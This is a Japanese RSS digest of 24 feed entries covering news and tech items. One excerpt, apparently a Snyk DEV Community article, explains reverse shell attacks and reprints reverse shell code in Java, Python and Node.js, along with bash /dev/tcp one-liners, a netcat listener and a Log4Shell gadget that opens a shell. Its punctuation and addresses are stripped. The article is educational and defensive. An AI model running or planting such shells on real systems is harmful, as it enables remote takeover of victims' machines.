投稿時間:2022-08-24 07:21:28 RSSフィード2022-08-24 07:00 分まとめ(24件)

カテゴリー等	サイト名等	記事タイトル・トレンドワード等	リンクURL	頻出ワード・要約等/検索ボリューム	登録日
IT	ITmedia 総合記事一覧	[ITmedia ビジネスオンライン] 都のコロナ協力金、不正受給総額3億円超え　累計で64件、最大5900万円	https://www.itmedia.co.jp/business/articles/2208/23/news174.html	itmedia	2022-08-24 06:30:00
IT	ITmedia 総合記事一覧	[ITmedia ビジネスオンライン] 閉塞する50代会社員……7割超が「毎日がつまらない」　理由は？	https://www.itmedia.co.jp/business/articles/2208/23/news079.html	itmedia	2022-08-24 06:30:00
IT	ITmedia 総合記事一覧	[ITmedia ビジネスオンライン] 「近畿のオマケ」和歌山行きの飛行機に、なぜ客が増えているのか	https://www.itmedia.co.jp/business/articles/2208/24/news048.html	ITmediaビジネスオンライン「近畿のオマケ」和歌山行きの飛行機に、なぜ客が増えているのかいま、和歌山県に熱い視線が注がれている。	2022-08-24 06:30:00
AWS	AWS Partner Network (APN) Blog	Designing a Multi-Tenant SFTP Server with AWS Transfer Family	https://aws.amazon.com/blogs/apn/designing-a-multi-tenant-sftp-server-with-aws-transfer-family/	Designing a Multi Tenant SFTP Server with AWS Transfer FamilyData security is a particularly important topic for multi tenant SaaS applications that handle customers sensitive data How to securely segregate tenant data and how to provide data access to customers will vary depending on the SaaS solution s architecture and its requirements This post explores how SaaS vendors can build secure scalable and cost effective data exchange mechanisms using SFTP SSH File Transfer Protocol with AWS managed services like AWS Transfer Family	2022-08-23 21:42:41
python	Pythonタグが付けられた新着投稿 - Qiita	【Python】陰陽座『廿弐匹目は毒蝮』をシミュレート	https://qiita.com/AnPanda/items/9e67c2a37efe25ea7fa6	陰陽座	2022-08-24 06:27:30
js	JavaScriptタグが付けられた新着投稿 - Qiita	【JavaScript】データ型とリテラル	https://qiita.com/andota05/items/57563724656e4ada14dd	javascrip	2022-08-24 06:55:52
AWS	AWSタグが付けられた新着投稿 - Qiita	AWS Amplifyで既存Reactアプリをホストする	https://qiita.com/thithi7110/items/8e70dcf3abe51436b629	github	2022-08-24 06:36:02
Git	Gitタグが付けられた新着投稿 - Qiita	一気にディレクトリ / ファイルを作成するLinuxコマンド	https://qiita.com/ijufumi/items/eaf45dded5c1a86c1f17	mkdirpabcdeef	2022-08-24 06:51:30
海外TECH	Ars Technica	Long-awaited Dead Island 2 reveal headlines Gamescom announcement frenzy	https://arstechnica.com/?p=1875571	pokemon	2022-08-23 21:30:59
海外TECH	Ars Technica	Scanning students’ homes during remote testing is unconstitutional, judge says	https://arstechnica.com/?p=1875691	illegal	2022-08-23 21:16:09
海外TECH	DEV Community	Como formatar e garantir boas práticas em projetos de automação Cypress utilizando a ferramenta Eslint.	https://dev.to/joaocosti/eslint-em-projetos-de-cypress-o-que-e-e-quais-suas-vantagens-5765	Como formatar e garantir boas práticas em projetos de automação Cypress utilizando a ferramenta Eslint No cotidiano da automação de testes ou em projetos que são criados códigos um dos principais problemas égarantir a qualidade seja com boas práticas ou um padrão de formatação Uma das maneiras para garantir a qualidade da automação érealizar a revisão de código de outras pessoas code review mas isso acaba sendo um processo custoso por necessitar de uma análise critica e correção de problemas Para nossa sorte existe uma ferramente que podemos utilizar que jáanalisa certos de erros de codificação formata o código conforme o padrão definido e no caso de automação com Cypress mostra no código onde existem más práticas de automação de testes A ferramenta que me refiro éo Eslint Para fins explicativos criei um repositório no GitHub com os cenários padrões fornecidos pelo Cypress na branch main Em seguida instalei o Eslint na branch eslint seguindo os padrões do lint airbnb Dentro do arquivo package json adicionei dois comandos dentro de scripts eslint eslint cypress eslint fix eslint cypress fix Ao executar o comando npm run eslint éapresentado no terminal apenas os erros e avisos de formatação ou de codificação por exemplo na imagem abaixo épossível ver um erro no arquivo ee js com a mensagem semi no início do erro épossível encontrar qual a linha que estáo erro no caso seria a O erro apresentado diz que estáfaltando um no final do código no javascript essa regra não éobrigatório mas como defini para utilizar o lint Airbnb éobrigatório O problema do comando a cima éa exaustão de colocar em todas as linhas necessárias ou ter que arrumar o espaçamento de cada linha segundo as regras do lint mas a boa notícia éque o outro comando npm run eslint fix jácorrige a formatação e apresenta somente os erros de codificação Quando digo erro de codificação seria uma variável que édeclarada mas nunca éusada ou uma importação de um arquivo que não existe Na imagem abaixo executei o comando anteriormente mencionado em relação àúltima figura os erros passaram de para isso porque os problemas de formatação foram resolvidos Na imagem acima o Eslint apresentou um erro em que alerta um problema para o cy wait isso porque eu instalei uma extensão que verifica boas práticas relacionadas a códigos de projetos cypress por padrão essa extensão possui as seguintes regras Impedir a atribuição de valores em comandos cy Evitar espera com cy wait Impedir o uso de async await em comandos Cypress Épossível adicionar outras regras por exemplo evitar que seja usado force true nos comandos Cypress para isso adicionei a regra cypress no force error na seção rules dento do arquivo do Eslint assim uma vez que execute o comando do Eslint seráapresentado erro em todos os comandos que utilizem force true ConclusãoA partir do Eslint épossível encontrar erros de formatação e codificação de forma eficiente essa ferramenta não acaba com a necessidade de code review mas permite que erros sejam encontrados e corrigidos de uma maneira mais eficiente LinksRepositório do no github que apliquei o eslintLint do cypressEslint	2022-08-23 21:40:00
海外TECH	DEV Community	What is a reverse shell attack?!	https://dev.to/snyk/taking-control-of-your-server-with-a-reverse-shell-attack-3mdg	What is a reverse shell attack Creating and running an application in your favorite language is usually pretty simple After you create your application deploying it and showing it to the world is also quite straightforward The last thing you need is someone to take over your system and fully control your brand new application In this article I ll explain how this can happen with a remote shell attack Note that the code examples in this article are for educational purposes only I mainly try to explain what a remote shell attack is and how it can occur in your applications Using this or any other example to hack someone is not advised In most countries hacking without the consent of the target is illegal even if you have the best intentions What is a reverse shell A reverse shell or connect back shell is a shell session initiated by the target machine to a remote host The target machine opens the session to a specific host and port A shell connection can be created if the remote host listens on that port with the appropriate software It s important to note that the initiation is done by the target machine not the remote host With a remote shell attack an attacker tries to make the victim machine initiate such a connection The attack can establish interactive shell access basically a terminal and take over the victim machine How does a reverse shell attack happen In most cases a reverse shell attack happens when an application is vulnerable to a remote code execution vulnerability An attacker uses such a vulnerability in an application to execute some code on the victim s machine that initiates the shell session Without knowing it the victim creates a connection and the attacker only has to listen for incoming connections on the correct port Once the connection is established the attacker has shell access to the victim and does all sorts of exciting things Think of it like a tennis ball If you throw it at something hard it will come back at you You only need to catch it at the right place and time Making a reverse shell connectionTo create a reverse shell you have multiple options depending on your language However before executing this reverse shell code we need to make sure that we listen to the correct port for incoming connections Listening for incoming connections using netcatA great tool to do this is netcat Netcat often abbreviated to nc is a computer networking utility for reading from and writing to network connections using TCP or UDP On the machine you want the reverse shell to connect to you can use netcat to listen to incoming connections on a specific port The example below shows how to make netcat listen to port Note that the v parameter is not strictly needed but it gives me a nice verbose output nc lvp Execute a reverse shell in Python Java or Node jsLet s discuss two approaches to setting up a reverse shell Both examples are suitable for systems that have the bash shell installed Method ProgrammaticallyThe first method is programmatic action where we start up a shell Next we create a socket connection to the remote computer with the appropriate IP address and port Lastly we connect the file descriptors input output and error from the shell to the newly created socket connection Java public static void main String args throws IOException Process process new ProcessBuilder bash redirectErrorStream true start Socket socket new Socket InputStream pInput process getInputStream InputStream pError process getErrorStream InputStream sInput socket getInputStream OutputStream pOutput process getOutputStream OutputStream sOutput socket getOutputStream while socket isClosed while pInput available gt sOutput write pInput read while pError available gt sOutput write pError read while sInput available gt pOutput write sInput read sOutput flush pOutput flush In this Java example we route the process s InputStream and ErrorStream to the OutputStream of the remote socket connection We also need to do this the other way around and write the Socket OutputStream into the Inputstream of the bash process Python import sys socket os pty s socket socket s connect os dup s fileno fd for fd in pty spawn bash In this Python script we connect the stdin stdout and stderr to the socket connection In Unix like systems these are the first three file descriptors Next we use pty to run bash Node js var net require net var cp require child process var sh cp spawn bash var client new net Socket client connect function client pipe sh stdin sh stdout pipe client sh stderr pipe client This Node js example is very similar to the Python example We run bash and connect the standard file descriptors appropriately to the socket connection Method Execute a shell commandThe second method is a bit shorter Most languages have a way to execute shell commands like Runtime getRuntime in Java os system in Python require child process exec in Node jsWe can leverage these functions to call a one liner shell command that initiates the reverse shell for us Java public static void main String args throws IOException String cmd bash c exec lt gt dev tcp cat lt amp while read line do line gt amp gt amp done Runtime getRuntime exec cmd Python import os os system bash c bash i lt gt dev tcp lt amp gt amp gt amp Node jsrequire child process exec bash c bash i lt gt dev tcp lt amp gt amp gt amp When you first execute the netcat command listening to port before executing this piece of code you will notice that the connection is established and you can execute shell commands like the one below You make a reverse shell connection to yourself with all of the above examples If you want to do this to a remote machine you obviously need to change the IP address appropriately Next remember that even if you have access the privilege depends on the user running this code on the victim s machine To get elevated privileges you might need to do a bit more Creating a reverse shell attack using a remote code execution vulnerabilityTo create an actual attack with code examples like this we need to leverage a code execution vulnerability and insert the code into an existing system A great example is the LogShell vulnerability that was discovered in December It was possible to insert a gadget class that executed code when it was instantiated Many of the examples showed how to launch the calculator or something harmless Nevertheless the code below would create a gadget for this infamous Logj vulnerability By exploiting LogShell now you do not start up the calculator anymore but weaponize it into a reversed shell enabler public class Evil implements ObjectFactory Override public Object getObjectInstance Object obj Name name Context nameCtx Hashtable lt gt environment throws Exception String cmd bin bash c exec lt gt dev tcp cat lt amp while read line do line gt amp gt amp done Runtime getRuntime exec cmd return null Almost all remote code executions can be used to enable a reverse shell attack Other recent examples were SpringShell and the Apache Commons Configuration RCE Both examples were not as problematic as LogShell but you can use either to create a reverse shell attack and possibly control a target machine Therefore it s essential to prevent that user input from partially being executed How to prevent reverse shell attacksIf we can prevent an attacker from executing code on your machine we eliminate almost all possibilities of a reverse shell attack Let s look at some measures you can take to prevent malicious reverse shell attacks as a developer Remove execution statements Statements in your code that can execute scripts or other pieces of code like exec should be avoided as much as possible Sanitize and validate inpu t All input must be considered potentially malicious This is not only direct user input For instance when a database field is the input of an execution somebody can try to attack the database Run your application with limited privileges Don t run your application as root but create a user with the least privileges needed This unfortunately happens a lot with applications in Docker containers as the default user in a Docker container is root Prevent vulnerabilities that enable remote code execution If a library or framework is compromised replace it with a secure version Almost all remote code executions can be used for a reverse shell attack even if the use case looks far fetched Snyk can help Snyk is a helpful tool for preventing reverse shell attacks by scanning code and dependencies It points out potential security mistakes in your custom code and scans your dependencies for known vulnerabilities Sign up for Snyk s free tier to start scanning	2022-08-23 21:18:12
海外TECH	Engadget	Twitter whistleblower claims company’s practices pose national security risk	https://www.engadget.com/twitter-whistleblower-national-security-china-russia-india-213558380.html?src=rss	Twitter whistleblower claims company s practices pose national security riskIn a whistleblower complaint Twitter s former security chief has raised serious questions not just about the company s security practices but the potential for foreign governments and entities to influence the company According to Peiter quot Mudge quot Zatko Twitter s dealings with other countries could be putting the United States national security at risk As reported by CNN the complaint details specific concerns relating to Russia China and India “A few months before CTO Parag Agrawal was promoted to CEO Agrawal suggested to Mudge that Twitter should consider ceding to the Russian Federation s censorship and surveillance demands as a way to grow users in Russia the complaint published byThe Washington Post states The document doesn t specify what steps Agrawal proposed As CNN points out Russia tried to force large tech companies including Twitter to open local offices in the country before its invasion of Ukraine The complaint states that the “suggestion was never pursued or implemented but it notes that the mere suggestion is “cause for concern about Twitter s effects on U S national security and that it was at odds with Jack Dorsey s wishes Zatko also raises questions about Twitter s financial relationship with unnamed “Chinese entities The complaint states that Twitter is “dependent upon revenue coming from Chinese entities even though the Twitter service is blocked in China The money led to “concerns within Twitter that the information the Chinese entities could receive would allow them to identify and learn sensitive information about Chinese users who successfully circumvented the block and other users around the world It goes on to say that “Mr Zatko was told that Twitter was too dependent on the revenue stream to do anything other than attempt to increase it Regarding Twitter s operations in India the complaint alleges that the Indian government “forced the company to hire at least one government agent who “would have access to vast amounts of Twitter s sensitive data It later says that a U S government source warned the company that “one or more particular company employees were working on behalf of another particular foreign intelligence agency The document doesn t specify what country the source was referring to Notably it s not the first time Twitter has dealt with an employee accused of spying for another country A former Twitter worker was recently convicted of acting as an agent for Saudi Arabia Prosecutors alleged the man was paid to turn over sensitive information about dissidents Elsewhere in the complaint Zatko states that Twitter repeatedly caught employees “intentionally installing spyware on their work computers at the request of external organizations even though it was against the company s policy to do so There are no further details provided about what organizations might be making such requests or why employees would comply but the complaint notes that as a result some “external people or organizations had more awareness of activity on some Twitter employee computers than Twitter itself had Twitter didn t immediately respond to a request for comment on the claims The company previously told The Washington Post and CNN the complaint was “riddled with inaccuracies Members of Congress including the Senate Intelligence Committee have already said they are looking into Zatko s allegations	2022-08-23 21:35:58
海外TECH	Engadget	NPR's podcast catalog comes to YouTube	https://www.engadget.com/npr-podcasts-youtube-212505567.html?src=rss	NPR x s podcast catalog comes to YouTubeGoogle is partnering with National Public Radio to bring the broadcaster s podcasts to YouTube On Thursday the two announced that more than NPR shows including Up First and Throughline are now available on the platform NPR is no stranger to YouTube Its Tiny Desks concert series has been a hit on the platform for a few years now with a recent Ludovico Einaudi performance amassing nearly views and counting The addition of NPR podcasts comes just as YouTube recently added an Explore page dedicated to the format While it s only available to some people the section highlights popular channels episodes and playlists as well as categories and recommended shows It may not explicitly market itself as a podcast platform but both the page and its new partnership with NPR show YouTube getting serious about the medium	2022-08-23 21:25:05
海外TECH	Engadget	Yelp adds a warning label to anti-abortion center listings	https://www.engadget.com/yelp-crisis-pregnancy-center-label-will-make-them-more-distinct-from-abortion-clinics-210351828.html?src=rss	Yelp adds a warning label to anti abortion center listingsStarting today Yelp will apply a label to business pages for crisis pregnancy centers also known as anti abortion centers to clarify that these facilities usually have limited medical services The label also notes that crisis pregnancy centers may not have licensed medical professionals onsite The consumer notice could help people avoid confusion with clinics that offer abortion services In a blog post Yelp said it was making the change following the US Supreme Court s decision in June to overturn Roe v Wade a ruling that conferred a nationwide right to safe abortion access for nearly years The trust and safety of our community is a top priority which is why providing consumers with reliable and useful information to help inform their decisions is critical to our mission ーthis includes access to reliable information about reproductive health services Yelp wrote YelpMany crisis pregnancy centers have religious affiliations as the Associated Presspreviously reported Some are said to provide misleading information about abortion and contraception Yelp has reviewed tens of thousands of business listings since with the aim of ensuring crisis pregnancy centers are differentiated from abortion clinics It noted that moderators have reclassified almost businesses as crisis pregnancy centers or faith based crisis pregnancy centers this year alone in the US after reviewing nearly business pages It plans to review more than business pages across the US Canada and Puerto Rico in the coming months This is an issue that other tech companies have been contending with Last week the Alphabet Workers Union demanded that Google address misleading search results related to abortion services by removing results for fake abortion providers Democratic lawmakers have asked Google to stop directing people seeking an abortion to anti abortion facilities while some Republican attorneys general warned the company not to limit such centers from appearing in search results In early July Google said it would delete abortion clinic visits from user location histories	2022-08-23 21:03:51
海外科学	NYT > Science	Webb Telescope’s New Jupiter Images and an Expanded Universe	https://www.nytimes.com/2022/08/23/science/james-webb-telescope-jupiter-galaxies.html	Webb Telescope s New Jupiter Images and an Expanded UniverseAs new images of Jupiter and a galactic survey spring forth from NASA s new observatory our cosmic affairs correspondent confesses he didn t anticipate their power	2022-08-23 21:48:07
金融	ニュース - 保険市場TIMES	かんぽ生命、「すこやか応援！！ちいかわといっしょ　～連続コラボ企画～」開催中	https://www.hokende.com/news/blog/entry/2022/08/24/070000	かんぽ生命、「すこやか応援ちいかわといっしょ連続コラボ企画」開催中大人気キャラクター「ちいかわ」が郵便局に登場株式会社かんぽ生命保険以下、かんぽ生命は年月日まで、「すこやか応援ちいかわといっしょ連続コラボ企画」を開催している。	2022-08-24 07:00:00
ニュース	BBC News - Home	Crawley Town 2-0 Fulham: League Two hosts beat Premier League visitors	https://www.bbc.co.uk/sport/football/62558160?at_medium=RSS&at_campaign=KARANGA	crawley	2022-08-23 21:55:17
ニュース	BBC News - Home	Stockport County 0-0 Leicester City (1-3 on pens): Foxes edge past League Two side	https://www.bbc.co.uk/sport/football/62558106?at_medium=RSS&at_campaign=KARANGA	Stockport County Leicester City on pens Foxes edge past League Two sideLeicester keeper Daniel Iversen saves three penalties to earn the Foxes a tense Carabao Cup shootout win against Stockport County	2022-08-23 21:35:34
北海道	北海道新聞	ツイッターの安全欠如告発　元セキュリティー責任者	https://www.hokkaido-np.co.jp/article/721253/	投稿サイト	2022-08-24 06:22:00
北海道	北海道新聞	フィンランド首相が謝罪　今度は公邸でパーティー	https://www.hokkaido-np.co.jp/article/721252/	謝罪	2022-08-24 06:22:00
北海道	北海道新聞	障害者ら、達成感や憤り　国連の日本政府審査終え	https://www.hokkaido-np.co.jp/article/721251/	日本政府	2022-08-24 06:22:00
北海道	北海道新聞	伊予鉄「タルト電車」出発進行　松山の銘菓をＰＲ	https://www.hokkaido-np.co.jp/article/721250/	伊予鉄グループ	2022-08-24 06:12:00
ビジネス	東洋経済オンライン	気象災害から鉄道を守る｢手だて｣はあるのか 東北を襲った豪雨､九州の例から学べる？ | ローカル線･公共交通 | 東洋経済オンライン	https://toyokeizai.net/articles/-/611696?utm_source=rss&utm_medium=http&utm_campaign=link_back	大型台風	2022-08-24 06:30:00